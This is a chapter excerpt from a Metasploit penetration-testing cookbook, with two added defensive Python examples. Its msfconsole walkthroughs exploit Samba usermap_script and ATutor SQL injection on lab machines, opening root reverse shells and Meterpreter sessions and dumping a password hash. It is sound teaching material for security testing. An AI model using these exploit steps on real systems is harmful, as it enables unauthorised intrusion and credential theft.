Metasploit Penetration Testing Cookbook, Third Edition: Chapter 3, Server-Side Exploitation, Worked Examples

Chapter 3: Server-Side Exploitation

In this chapter, we will cover the following topics:

1. Exploiting a Linux server

2. SQL injection

3. Types of shell

4. Exploiting a Windows server

5. Exploiting common services

6. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

7. MS17-010 EternalRomance/EternalSynergy/EternalChampion

8. Installing backdoors

9. Denial of Service

Introduction

In Chapter 2, Information Gathering and Scanning, we collected the target's IP addresses, ports, services, operating system and other information. The most valuable result of information gathering is the operating system of the server or system. This information is very useful for the subsequent penetration of the target machine, because it lets us quickly look up the services running on the system and their vulnerabilities. The process is somewhat involved, but having this information greatly reduces our later work.

Every operating system has flaws. Once a vulnerability is reported, exploit development begins. Licensed operating systems, such as Windows, can quickly develop patches for a vulnerability or bug and push them to users as updates. Vulnerability disclosure is a serious issue, and 0-day vulnerabilities in particular can cause serious damage to the computer industry. 0-days are highly sought after and fetch between $15,000 and $1,000,000 on the market. Vulnerabilities are discovered and exploited, but whether a vulnerability is disclosed depends on the researcher and their intentions.

Well-known companies such as Microsoft, Apple and Google release patches for their products regularly, because they are responsible to a large user base. In a corporate setting things are worse: because of the downtime involved and the need to keep business continuity unaffected, servers can take weeks to patch. It is therefore advisable to keep your operating system updated, or to closely follow any newly discovered vulnerabilities in it. Unpatched systems are a hacker's favourite, because they can launch an attack immediately and compromise the target. Operating systems must therefore be patched and updated regularly. In this chapter, we will focus on vulnerabilities reported in some of the most popular services and operating systems.

During a penetration test, once information about the target operating system is available, the tester begins looking for exploits for the specific service or operating system vulnerability. This chapter is therefore our first step in diving into server-side vulnerabilities on the target. We will focus on some widely used Windows and Linux operating systems. We will also look at how to use the exploits for these vulnerabilities and set their parameters so that they execute on the target machine. Finally, we will discuss payloads in the Metasploit framework.

Before exploiting the target machine, we first need to know some basics about exploit modules and payloads, such as how to set their parameters.

To exploit a target, we first need to scan its ports and services; once enough information has been gathered, the next step is to pick the matching exploit and attack the target. Let's learn some of the exploitation commands in msfconsole.

msfconsole, and how to start it, was covered in the previous chapters.

In msfconsole, to see the help, simply type the help command:

  msf5 > help
  Core Commands
  =============
  Command    Description
  -------    -----------
  ?          Help menu
  banner     Display an awesome metasploit banner
  cd         Change the current working directory
  color      Toggle color
  connect    Communicate with a host
  exit       Exit the console
  get        Gets the value of a context-specific variable
  getg       Gets the value of a global variable
  grep       Grep the output of another command
  help       Help menu
  history    Show command history
  load       Load a framework plugin
  quit       Exit the console
  repeat     Repeat a list of commands
  route      Route traffic through a session
  save       Saves the active datastores
  sessions   Dump session listings and display information about session
  set        Sets a context-specific variable to a value
  setg       Sets a global variable to a value
  sleep      Do nothing for the specified number of seconds
  spool      Write console output into a file as well the screen
  threads    View and manipulate background threads
  ....
  set RHOSTS fe80::3990:0000/110, ::1-::f0f0
  Target a block from a resolved domain name:
  set RHOSTS www.example.test/24
  msf5 >

Looking at the output, there are many commands, and you may feel overwhelmed. But we have already seen some of them, such as the database commands. We will now focus on the commands that are most useful in the exploitation phase and pick up the others along the way.

The most useful command: the search command

  msf5 > search -h
  Usage: search [ options ] <keywords>
  OPTIONS:
  -h                Show this help information
  -o <file>         Send output to a file in csv format
  -S <string>       Search string for row filter
  -u                Use module if there is one result
  Keywords:
  aka         :  Modules with a matching AKA (also-known-as) name
  author      :  Modules written by this author
  arch        :  Modules affecting this architecture
  bid         :  Modules with a matching Bugtraq ID
  cve         :  Modules with a matching CVE ID
  edb         :  Modules with a matching Exploit-DB ID
  check       :  Modules that support the 'check' method
  date        :  Modules with a matching disclosure date
  description :  Modules with a matching description
  full_name   :  Modules with a matching full name
  mod_time    :  Modules with a matching modification date
  name        :  Modules with a matching descriptive name
  path        :  Modules with a matching path
  platform    :  Modules affecting this platform
  port        :  Modules with a matching port
  rank        :  Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))
  ref         :  Modules with a matching ref
  reference   :  Modules with a matching reference
  target      :  Modules affecting this target
  type        :  Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)
  Examples:
  search cve:2009 type:exploit
  msf5 >

With search we can look up a great many things, including modules, vulnerabilities and so on.

1. Exploiting a Linux server

Linux is one of the most widely used operating systems. In the previous chapters, we learned how to scan for available services and how to use vulnerability scanners to find vulnerabilities on the target. In this section, we will use Metasploitable2 as the target machine and exploit a Samba service vulnerability to attack the Linux target.

Getting ready

First, we use the services command to look up the earlier nmap scan results, filtering on ports 139 and 445.

  msf5 > services -c port,info -p 139,445 192.168.177.145
  Services
  ========
  host             port  info
  ----             ----  ----
  192.168.177.145  139   Samba smbd 3.X - 4.X workgroup: WORKGROUP
  192.168.177.145  445   Samba smbd 3.X - 4.X workgroup: WORKGROUP
  msf5 >

Now that we know the target's Samba version, we can look up the corresponding vulnerabilities and then use the search command to find a usable exploit module.

TIP: Details of the Samba 3.0.20 vulnerabilities can be found on the Common Vulnerabilities and Exposures (CVE) site https://www.cvedetails.com.

Filtering with the search command on the CVE year, the module type and a keyword finds the usable exploit module.

  msf5 > search cve:2007 type:exploit samba
  Matching Modules
  ================
  #  Name  Disclosure Date  Rank  Check  Description
  -  ----  ---------------  ----  -----  -----------
  1  exploit/linux/samba/lsa_transnames_heap  2007-05-14  good  Yes  Samba lsa_io_trans_names Heap Overflow
  2  exploit/multi/samba/usermap_script  2007-05-14  excellent  No  Samba "username map script" Command Execution
  3  exploit/osx/samba/lsa_transnames_heap  2007-05-14  average  No  Samba lsa_io_trans_names Heap Overflow
  4  exploit/solaris/samba/lsa_transnames_heap  2007-05-14  average  No  Samba lsa_io_trans_names Heap Overflow
  msf5 >

How to do it...

1. Select the exploit module

  msf5 > use exploit/multi/samba/usermap_script
  msf5 exploit(multi/samba/usermap_script) >

2. Run info to see the module's information

  msf5 exploit(multi/samba/usermap_script) > info
  Name: Samba "username map script" Command Execution
  Module: exploit/multi/samba/usermap_script
  Platform: Unix
  Arch: cmd
  Privileged: Yes
  License: Metasploit Framework License (BSD)
  Rank: Excellent
  Disclosed: 2007-05-14
  ......
  Description:
  This module exploits a command execution vulnerability in Samba
  versions 3.0.20 through 3.0.25rc3 when using the non-default
  "username map script" configuration option. By specifying a username
  containing shell meta characters, attackers can execute arbitrary
  commands. No authentication is needed to exploit this vulnerability
  since this option is used to map usernames prior to authentication!
  References:
  https://cvedetails.com/cve/CVE-2007-2447/
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html
  msf5 exploit(multi/samba/usermap_script) >

From the module description we can see that this module exploits a command execution vulnerability in Samba 3.0.20 through 3.0.25rc3. Let's try it.

3. Configure the options

Use the show missing command to see the options that still have to be set

  msf5 exploit(multi/samba/usermap_script) > show missing
  Module options (exploit/multi/samba/usermap_script):
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target address range or CIDR identifier
  msf5 exploit(multi/samba/usermap_script) >

TIP: To show a module's advanced options, use the show advanced command

Here we only need to set the target IP address, which we do with set [option] [value]

  msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.177.145
  RHOSTS => 192.168.177.145
  msf5 exploit(multi/samba/usermap_script) >

4. Exploit

Simply run exploit.

  msf5 exploit(multi/samba/usermap_script) > exploit
  [*] Started reverse TCP double handler on 192.168.177.143:4444
  [*] Accepted the first client connection...
  [*] Accepted the second client connection...
  [*] Command: echo 48vnI4nfAB1GTD5d;
  [*] Writing to socket A
  [*] Writing to socket B
  [*] Reading from sockets...
  [*] Reading from socket B
  [*] B: "48vnI4nfAB1GTD5d\r\n"
  [*] Matching...
  [*] A is input...
  [*] Command shell session 1 opened (192.168.177.143:4444 -> 192.168.177.145:51353) at 2019-04-26 13:14:08 +0800

Once the attack succeeds, we get a session connected to the target machine. We can run a few commands to verify that we have obtained access to the target.

  hostname
  metasploitable
  ip a show
  1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
      link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
      inet 127.0.0.1/8 scope host lo
      inet6 ::1/128 scope host
         valid_lft forever preferred_lft forever
  2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
      link/ether 00:0c:29:cc:9a:ea brd ff:ff:ff:ff:ff:ff
      inet 192.168.177.145/24 brd 192.168.177.255 scope global eth0
      inet6 fe80::20c:29ff:fecc:9aea/64 scope link
         valid_lft forever preferred_lft forever
  3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000
      link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff
  id
  uid=0(root) gid=0(root)

Ctrl+Z sends the session to the background

  uid=0(root) gid=0(root)
  ^Z                              // press Ctrl+Z
  Background session 1? [y/N] y
  msf5 exploit(multi/samba/usermap_script) >

5. To manage sessions, use the sessions command

  msf5 exploit(multi/samba/usermap_script) > sessions -h
  Usage: sessions [options] or sessions [id]
  Active session manipulation and interaction.
  OPTIONS:
  -C <opt>  Run a Meterpreter Command on the session given with -i, or all
  -K        Terminate all sessions
  -S <opt>  Row search filter.
  -c <opt>  Run a command on the session given with -i, or all
  -d        List all inactive sessions
  -h        Help banner
  -i <opt>  Interact with the supplied session ID
  -k <opt>  Terminate sessions by session ID and/or range
  -l        List all active sessions
  -n <opt>  Name or rename a session by ID
  -q        Quiet mode
  -s <opt>  Run a script or module on the session given with -i, or all
  -t <opt>  Set a response timeout (default: 15)
  -u <opt>  Upgrade a shell to a meterpreter session on many platforms
  -v        List all active sessions in verbose mode
  -x        Show extended information in the session table
  Many options allow specifying session ranges using commas and dashes.
  For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
  msf5 exploit(multi/samba/usermap_script) >

6. To return to the session, use sessions -i [session_id]; sessions -l lists all active sessions.

  msf5 exploit(multi/samba/usermap_script) > sessions -l
  Active sessions
  ===============
  Id  Name  Type      Information  Connection
  --  ----  ----      -----------  ----------
  1   shell cmd/unix               192.168.177.143:4444 -> 192.168.177.145:51353 (192.168.177.145)
  msf5 exploit(multi/samba/usermap_script) > sessions -i 1
  [*] Starting interaction with 1...
  id
  uid=0(root) gid=0(root)
  ip a show
  1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
      link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
      inet 127.0.0.1/8 scope host lo
      inet6 ::1/128 scope host
         valid_lft forever preferred_lft forever
  2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
      link/ether 00:0c:29:cc:9a:ea brd ff:ff:ff:ff:ff:ff
      inet 192.168.177.145/24 brd 192.168.177.255 scope global eth0
      inet6 fe80::20c:29ff:fecc:9aea/64 scope link
         valid_lft forever preferred_lft forever
  3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000
      link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff

To terminate a session, press Ctrl+C

      link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff
  ^C                              // Ctrl+C
  Abort session 1? [y/N] y        // type y
  ""
  [*] 192.168.177.145 - Command shell session 1 closed. Reason: User exit
  msf5 exploit(multi/samba/usermap_script) >

How it works...

Samba is a service for printing and file sharing between Linux and Windows. The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the SamrChangePassword function when the "username map script" option in smb.conf is enabled (it is not enabled by default), and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in remote printer and file share management. The exploit module executes arbitrary commands by specifying a username that contains shell metacharacters. Because this option is used to map usernames before authentication, no authentication is needed to exploit the vulnerability.
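A defender-side check for the precondition just described, written as an added example for this page (it is not from the book or from Metasploit): it reads an smb.conf, flags the non-default username map script option, and tests a reported Samba version against the 3.0.20 to 3.0.25rc3 range that the module description gives. The configuration, the script path and the version strings are constructed samples.

```python
import re

# Affected range as stated in the usermap_script module description quoted above:
# Samba 3.0.20 through 3.0.25rc3 (the final 3.0.25 release is fixed).
VULN_LOW = (3, 0, 20)
VULN_FIX = (3, 0, 25)
LAST_AFFECTED_RC = 3

def parse_samba_version(version):
    """'3.0.25rc3' -> ((3, 0, 25), 3); '3.0.26a' -> ((3, 0, 26), None)."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+)|[a-z])?", version.strip())
    if not m:
        raise ValueError(f"unrecognised Samba version string: {version!r}")
    nums = tuple(int(x) for x in m.group(1, 2, 3))
    rc = int(m.group(4)) if m.group(4) else None
    return nums, rc

def version_in_affected_range(version):
    """True when the version lies inside 3.0.20 .. 3.0.25rc3 (release candidates sort before the final release)."""
    nums, rc = parse_samba_version(version)
    if nums < VULN_LOW or nums > VULN_FIX:
        return False
    if nums == VULN_FIX:
        return rc is not None and rc <= LAST_AFFECTED_RC
    return True

def parse_smb_conf(text):
    """Minimal smb.conf reader returning {section: {parameter: value}}.
    Parameter names are lowercased with whitespace collapsed, which is how Samba matches them."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
            continue
        if "=" in line and section is not None:
            key, value = line.split("=", 1)
            conf[section][" ".join(key.lower().split())] = value.strip()
    return conf

def audit_smb_conf(text, samba_version=None):
    """Return findings: the risky option if it is set, and the version if it is in the affected range."""
    conf = parse_smb_conf(text)
    findings = []
    script = conf.get("global", {}).get("username map script")
    if script:
        findings.append(
            f"[global] 'username map script' = {script!r}: the supplied username reaches a shell "
            "before authentication, which is the precondition for CVE-2007-2447")
    if samba_version is not None and version_in_affected_range(samba_version):
        findings.append(f"Samba {samba_version} is inside the affected range 3.0.20 - 3.0.25rc3")
    return findings

# Constructed sample configuration (not taken from any real host); the script path is made up.
SAMPLE_SMB_CONF = """\
# constructed sample smb.conf
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba)
   ; the non-default option that turns a username into a shell command line
   username map script = /etc/samba/scripts/mapusers.sh

[homes]
   comment = Home Directories
   browseable = no
"""

if __name__ == "__main__":
    for finding in audit_smb_conf(SAMPLE_SMB_CONF, samba_version="3.0.20"):
        print("[!]", finding)
    # A host without the option and on a fixed release produces no findings.
    print(audit_smb_conf("[global]\n   workgroup = WORKGROUP\n", samba_version="3.0.25"))
```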

What about the payload?

We did not specify a payload, so Metasploit chose a default payload for us. We can see it with show options

  msf5 exploit(multi/samba/usermap_script) > show options
  Module options (exploit/multi/samba/usermap_script):
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS  192.168.177.145  yes       The target address range or CIDR identifier
  RPORT   139              yes       The target port (TCP)
  Payload options (cmd/unix/reverse):
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  LHOST  192.168.177.143  yes       The listen address (an interface may be specified)
  LPORT  4444             yes       The listen port
  Exploit target:
  Id  Name
  --  ----
  0   Automatic
  msf5 exploit(multi/samba/usermap_script) >

As we can see, the payload used is a Unix reverse shell

We can list all payloads compatible with the current exploit module with show payloads.

  msf5 exploit(multi/samba/usermap_script) > show payloads
  Compatible Payloads
  ===================
  #  Name  Disclosure Date  Rank  Check  Description
  -  ----  ---------------  ----  -----  -----------
  1   cmd/unix/bind_awk  normal  No  Unix Command Shell, Bind TCP (via AWK)
  2   cmd/unix/bind_busybox_telnetd  normal  No  Unix Command Shell, Bind TCP (via BusyBox telnetd)
  3   cmd/unix/bind_inetd  normal  No  Unix Command Shell, Bind TCP (inetd)
  4   cmd/unix/bind_lua  normal  No  Unix Command Shell, Bind TCP (via Lua)
  5   cmd/unix/bind_netcat  normal  No  Unix Command Shell, Bind TCP (via netcat)
  6   cmd/unix/bind_netcat_gaping  normal  No  Unix Command Shell, Bind TCP (via netcat -e)
  7   cmd/unix/bind_netcat_gaping_ipv6  normal  No  Unix Command Shell, Bind TCP (via netcat -e) IPv6
  8   cmd/unix/bind_perl  normal  No  Unix Command Shell, Bind TCP (via Perl)
  9   cmd/unix/bind_perl_ipv6  normal  No  Unix Command Shell, Bind TCP (via perl) IPv6
  10  cmd/unix/bind_r  normal  No  Unix Command Shell, Bind TCP (via R)
  11  cmd/unix/bind_ruby  normal  No  Unix Command Shell, Bind TCP (via Ruby)
  12  cmd/unix/bind_ruby_ipv6  normal  No  Unix Command Shell, Bind TCP (via Ruby) IPv6
  13  cmd/unix/bind_socat_udp  normal  No  Unix Command Shell, Bind UDP (via socat)
  14  cmd/unix/bind_zsh  normal  No  Unix Command Shell, Bind TCP (via Zsh)
  15  cmd/unix/generic  normal  No  Unix Command, Generic Command Execution
  16  cmd/unix/reverse  normal  No  Unix Command Shell, Double Reverse TCP (telnet)
  17  cmd/unix/reverse_awk  normal  No  Unix Command Shell, Reverse TCP (via AWK)
  18  cmd/unix/reverse_bash_telnet_ssl  normal  No  Unix Command Shell, Reverse TCP SSL (telnet)
  19  cmd/unix/reverse_ksh  normal  No  Unix Command Shell, Reverse TCP (via Ksh)
  20  cmd/unix/reverse_lua  normal  No  Unix Command Shell, Reverse TCP (via Lua)
  21  cmd/unix/reverse_ncat_ssl  normal  No  Unix Command Shell, Reverse TCP (via ncat)
  22  cmd/unix/reverse_netcat  normal  No  Unix Command Shell, Reverse TCP (via netcat)
  23  cmd/unix/reverse_netcat_gaping  normal  No  Unix Command Shell, Reverse TCP (via netcat -e)
  24  cmd/unix/reverse_openssl  normal  No  Unix Command Shell, Double Reverse TCP SSL (openssl)
  25  cmd/unix/reverse_perl  normal  No  Unix Command Shell, Reverse TCP (via Perl)
  26  cmd/unix/reverse_perl_ssl  normal  No  Unix Command Shell, Reverse TCP SSL (via perl)
  27  cmd/unix/reverse_php_ssl  normal  No  Unix Command Shell, Reverse TCP SSL (via php)
  28  cmd/unix/reverse_python  normal  No  Unix Command Shell, Reverse TCP (via Python)
  29  cmd/unix/reverse_python_ssl  normal  No  Unix Command Shell, Reverse TCP SSL (via python)
  30  cmd/unix/reverse_r  normal  No  Unix Command Shell, Reverse TCP (via R)
  31  cmd/unix/reverse_ruby  normal  No  Unix Command Shell, Reverse TCP (via Ruby)
  32  cmd/unix/reverse_ruby_ssl  normal  No  Unix Command Shell, Reverse TCP SSL (via Ruby)
  33  cmd/unix/reverse_socat_udp  normal  No  Unix Command Shell, Reverse UDP (via socat)
  34  cmd/unix/reverse_ssl_double_telnet  normal  No  Unix Command Shell, Double Reverse TCP SSL (telnet)
  35  cmd/unix/reverse_zsh  normal  No  Unix Command Shell, Reverse TCP (via Zsh)
  msf5 exploit(multi/samba/usermap_script) >

We can also upgrade a shell session to a Meterpreter session with sessions -u [session_id], which gives us access to Meterpreter's advanced features. Meterpreter is covered in detail in later chapters.

  msf5 exploit(multi/samba/usermap_script) > sessions -u 2
  [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [2]
  [*] Upgrading session ID: 2
  [*] Starting exploit/multi/handler
  [*] Started reverse TCP handler on 192.168.177.143:4433
  [*] Sending stage (985320 bytes) to 192.168.177.145
  [*] Meterpreter session 3 opened (192.168.177.143:4433 -> 192.168.177.145:35189) at 2019-04-26 13:46:35 +0800
  [*] Command stager progress: 100.00% (773/773 bytes)

2. SQL injection

Metasploit has several exploit modules for SQL injection vulnerabilities, which let us test and verify whether a target is vulnerable.

Getting ready

We will install a vulnerable open source LMS, ATutor 2.2.1, for testing. Visit www.exploit-db.com/exploits/39… and click the download button next to VULNERABLE APP to download ATutor 2.2.1.

TIP: For how to install ATutor, see the official documentation.

How to do it...

This module exploits a SQL injection vulnerability and an authentication vulnerability in ATutor 2.2.1, which means we can bypass authentication, reach the administration interface and upload malicious code.

1. Use the exploit/multi/http/atutor_sqli module and look at the module options

  msf5 > use exploit/multi/http/atutor_sqli
  msf5 exploit(multi/http/atutor_sqli) > show options
  Module options (exploit/multi/http/atutor_sqli):
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /ATutor/         yes       The path of Atutor
  VHOST                       no        HTTP server virtual host
  Exploit target:
  Id  Name
  --  ----
  0   Automatic
  msf5 exploit(multi/http/atutor_sqli) >

2. Before exploiting, we can use the check command to test whether the target is vulnerable, and then run the exploit

  msf5 exploit(multi/http/atutor_sqli) > check
  [+] 192.168.177.139:80 - The target is vulnerable.
  msf5 exploit(multi/http/atutor_sqli) >
  msf5 exploit(multi/http/atutor_sqli) > exploit
  [*] Started reverse TCP handler on 192.168.177.143:4444
  [*] 192.168.177.139:80 - Dumping the username and password hash...
  [*] Started reverse TCP handler on 192.168.177.143:4444
  [*] 192.168.177.139:80 - Dumping the username and password hash...
  [+] 192.168.177.139:80 - Got the root's hash: 9c352326223a09bc610ff4919e611bed3fbb28f5 !
  [*] Sending stage (38247 bytes) to 192.168.177.139
  [*] Meterpreter session 13 opened (192.168.177.143:4444 -> 192.168.177.139:50088) at 2019-04-28 13:53:36 +0800
  [!] This exploit may require manual cleanup of 'ytux.php' on the target
  [!] This exploit may require manual cleanup of '/var/content/module/zyq/ytux.php' on the target
  meterpreter >

The time this takes varies with the complexity of the password. Once the attack succeeds, we have a shell

  meterpreter > getuid
  Server username: Administrator (0)
  meterpreter > sysinfo
  Computer    : WIN-BGKRU85VR4H
  OS          : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586
  Meterpreter : php/windows
  meterpreter >

3. Types of shell

Before moving on to the next section, let's discuss the types of shell available. Broadly, there are two kinds of shell: bind shells and reverse shells.

A bind shell, also called a forward-connect shell, is a program that listens on a local port on the target machine and lets the attacker connect to that port. Bind shells are well suited to local exploits, for example when you have already compromised the target through a phishing attack and want to use a local service to escalate privileges. They are not suitable for remote attack scenarios, however, because the target is usually behind a firewall.

So most of the time we use a reverse shell as our payload. With a reverse shell, the attacker listens on a port and the exploit program, once running on the target, connects back to the attacker's listening port. Since firewalls mostly restrict inbound connections only, reverse shells get past firewalls more easily.

Payloads

Metasploit has three different types of payload module: singles, stagers and stages.

Singles: standalone payloads that can be planted on the target system and executed directly, such as shell_bind_tcp

Stagers: payloads responsible for setting up the network connection, used together with stage payloads. They are small and reliable

Stages: payloads that provide advanced functionality once the stager has established a stable connection, such as shell, meterpreter, dllinject, patchupdllinject, upexec and vncinject. Metasploit's Meterpreter is itself a payload; it uses a stager and a stage together.
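To make the single/stager/stage distinction concrete, here is an added example (not from the book or from Metasploit) that parses rows in the layout of the show payloads table and classifies each payload by direction (bind or reverse) and by staging. It relies on Metasploit's naming convention, which the table's own descriptions confirm: a stage name followed by a slash and a connection method (php/meterpreter/reverse_tcp, "Stager") is a stager plus stage, while an underscore (php/meterpreter_reverse_tcp, "Inline") is a single. The same rule is applied to windows/x64 paths that do not appear on this page; the sample table is a constructed excerpt.

```python
import re
from dataclasses import dataclass

# Stage names listed above: a payload whose second-to-last path element is one of these
# and whose last element is a connection method (bind_/reverse_/find_) is a stager + stage pair.
STAGES = {"shell", "meterpreter", "dllinject", "patchupdllinject", "upexec", "vncinject"}
CONNECTION = re.compile(r"^(bind|reverse|find)_")

# A data row of `show payloads`: "#  Name  Disclosure Date  Rank  Check  Description"
# (payloads carry no disclosure date, so that column is empty).
ROW = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\S+)\s+(Yes|No)\s+(.+?)\s*$")

@dataclass
class PayloadInfo:
    name: str
    direction: str  # 'bind', 'reverse' or 'other'
    staging: str    # 'staged' or 'single'
    description: str

def classify_payload(name, description=""):
    """Classify one payload path; the console description, when given, must agree with the naming rule."""
    parts = name.split("/")
    last = parts[-1]
    if "bind" in last:
        direction = "bind"
    elif "reverse" in last:
        direction = "reverse"
    else:
        direction = "other"
    staged = len(parts) >= 3 and parts[-2] in STAGES and CONNECTION.match(last) is not None
    staging = "staged" if staged else "single"
    if "Stager" in description and staging != "staged":
        raise ValueError(f"{name}: description says Stager but the name reads as a single")
    if "Inline" in description and staging != "single":
        raise ValueError(f"{name}: description says Inline but the name reads as staged")
    return PayloadInfo(name, direction, staging, description)

def parse_show_payloads(text):
    """Parse pasted console table text and classify every data row; header and rule lines are skipped."""
    result = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            _, name, _rank, _check, desc = m.groups()
            result.append(classify_payload(name, desc))
    return result

def summarize(infos):
    """Count payloads per (direction, staging) pair."""
    counts = {}
    for p in infos:
        key = (p.direction, p.staging)
        counts[key] = counts.get(key, 0) + 1
    return counts

# Constructed excerpt in the console's table layout; the rows are ones listed on this page.
SAMPLE_TABLE = """\
   #   Name                          Disclosure Date  Rank    Check  Description
   -   ----                          ---------------  ----    -----  -----------
   2   generic/shell_bind_tcp                         normal  No     Generic Command Shell, Bind TCP Inline
   3   generic/shell_reverse_tcp                      normal  No     Generic Command Shell, Reverse TCP Inline
   6   php/bind_php                                   normal  No     PHP Command Shell, Bind TCP (via PHP)
   10  php/meterpreter/bind_tcp                       normal  No     PHP Meterpreter, Bind TCP Stager
   14  php/meterpreter/reverse_tcp                    normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  php/meterpreter_reverse_tcp                    normal  No     PHP Meterpreter, Reverse TCP Inline
   18  php/reverse_php                                normal  No     PHP Command Shell, Reverse TCP (via PHP)
"""

if __name__ == "__main__":
    infos = parse_show_payloads(SAMPLE_TABLE)
    for p in infos:
        print(f"{p.name:30} {p.direction:8} {p.staging:7} {p.description}")
    print(summarize(infos))
```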

Getting ready

In the previous section on SQL injection we already obtained a working exploit, so we will use it to test the different payload types

How to do it...

1. Use the show payloads command to display the available payloads.

  msf5 exploit(multi/http/atutor_sqli) > show payloads
  Compatible Payloads
  ===================
  #  Name  Disclosure Date  Rank  Check  Description
  -  ----  ---------------  ----  -----  -----------
  1   generic/custom  normal  No  Custom Payload
  2   generic/shell_bind_tcp  normal  No  Generic Command Shell, Bind TCP Inline
  3   generic/shell_reverse_tcp  normal  No  Generic Command Shell, Reverse TCP Inline
  4   php/bind_perl  normal  No  PHP Command Shell, Bind TCP (via Perl)
  5   php/bind_perl_ipv6  normal  No  PHP Command Shell, Bind TCP (via perl) IPv6
  6   php/bind_php  normal  No  PHP Command Shell, Bind TCP (via PHP)
  7   php/bind_php_ipv6  normal  No  PHP Command Shell, Bind TCP (via php) IPv6
  8   php/download_exec  normal  No  PHP Executable Download and Execute
  9   php/exec  normal  No  PHP Execute Command
  10  php/meterpreter/bind_tcp  normal  No  PHP Meterpreter, Bind TCP Stager
  11  php/meterpreter/bind_tcp_ipv6  normal  No  PHP Meterpreter, Bind TCP Stager IPv6
  12  php/meterpreter/bind_tcp_ipv6_uuid  normal  No  PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
  13  php/meterpreter/bind_tcp_uuid  normal  No  PHP Meterpreter, Bind TCP Stager with UUID Support
  14  php/meterpreter/reverse_tcp  normal  No  PHP Meterpreter, PHP Reverse TCP Stager
  15  php/meterpreter/reverse_tcp_uuid  normal  No  PHP Meterpreter, PHP Reverse TCP Stager
  16  php/meterpreter_reverse_tcp  normal  No  PHP Meterpreter, Reverse TCP Inline
  17  php/reverse_perl  normal  No  PHP Command, Double Reverse TCP Connection (via Perl)
  18  php/reverse_php  normal  No  PHP Command Shell, Reverse TCP (via PHP)
  msf5 exploit(multi/http/atutor_sqli) >

2. To see a payload's details, use the info <payload> command

  msf5 exploit(multi/http/atutor_sqli) > info payload/generic/shell_bind_tcp
  Name: Generic Command Shell, Bind TCP Inline
  Module: payload/generic/shell_bind_tcp
  Platform: All
  Arch: x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r
  Needs Admin: No
  Total size: 0
  Rank: Normal
  Provided by:
  skape <mmiller@hick.org>
  Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  LPORT  4444             yes       The listen port
  RHOST                   no        The target address
  Description:
  Listen for a connection and spawn a command shell
  msf5 exploit(multi/http/atutor_sqli) >

3. generic/shell_bind_tcp is a single payload. To select it as the payload, use set payload <payload_name>

  msf5 exploit(multi/http/atutor_sqli) > set payload generic/shell_bind_tcp
  payload => generic/shell_bind_tcp
  msf5 exploit(multi/http/atutor_sqli) > exploit
  [*] 192.168.177.139:80 - Dumping the username and password hash...

4. The generic/shell_bind_tcp payload gives us a generic shell, but that is far from enough. PHP Meterpreter is a feature-rich and more advanced payload that we can use to exploit this vulnerability.

  msf5 exploit(multi/http/atutor_sqli) > info payload/php/meterpreter/reverse_tcp
  Name: PHP Meterpreter, PHP Reverse TCP Stager
  Module: payload/php/meterpreter/reverse_tcp
  Platform: PHP
  Arch: php
  Needs Admin: No
  Total size: 1101
  Rank: Normal
  Provided by:
  egypt <egypt@metasploit.com>
  Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  LHOST                   yes       The listen address (an interface may be specified)
  LPORT  4444             yes       The listen port
  Description:
  Run a meterpreter server in PHP. Reverse PHP connect back stager
  with checks for disabled functions
  msf5 exploit(multi/http/atutor_sqli) >

  msf5 exploit(multi/http/atutor_sqli) > set PAYLOAD php/meterpreter/reverse_tcp
  PAYLOAD => php/meterpreter/reverse_tcp
  msf5 exploit(multi/http/atutor_sqli) > set LHOST 192.168.177.143
